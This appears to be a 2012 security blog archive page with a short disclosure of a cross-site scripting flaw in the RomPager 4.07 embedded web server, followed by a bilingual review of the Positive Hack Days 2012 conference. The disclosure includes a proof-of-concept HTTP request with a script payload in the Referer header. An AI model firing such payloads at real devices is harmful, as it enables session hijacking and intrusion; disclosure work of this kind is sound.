Monthly Archives: June 2012

RomPager 4.07 cross-site scripting vulnerability

During testing IPs that were sources of attacks on php-cgi vulnerability discovered by eindbazen (CVE-2012-1823) accidentally found XSS in Referer header in RomPager/4.07 embedded web server.

GET http://IP.IP.IP.IP/s0urc3_that_not_exists HTTP/1.1

..

Referer: http://dtls.com/”><script>alert(document.cookie)</script&gt;

Tagged , ,

Positive Hack Days 2012

!!! Статья заказная !!!

Плюсы-минусы конференции phdays 2012 от Positive Technologies.

(+)

– big place;

– serious teams;

– working staff;

– good level and wide range of tasks at CTF;

– lot posibilities to communicate with real guys (visitors, speakers, participants);

– good materials from speakers (50%);

– good conditions for speakers;

– very good translation of speaking;

– 0day from LeetMore team (the proof is needed!);

– ATM hacking and dumpster diving were looked very exciting.

(-)

Exists. No way to say. Thnx for those who always listen only themselves.

PS Thanks a lot for all guys from CTF teams (esp. Shell-Storm, 0daysober, C.o.P, PPP, int3pids, HackerDom)

Good photos of phdays are also located here

Участники были поражены обилием открытых Wi-Fi точек в России :)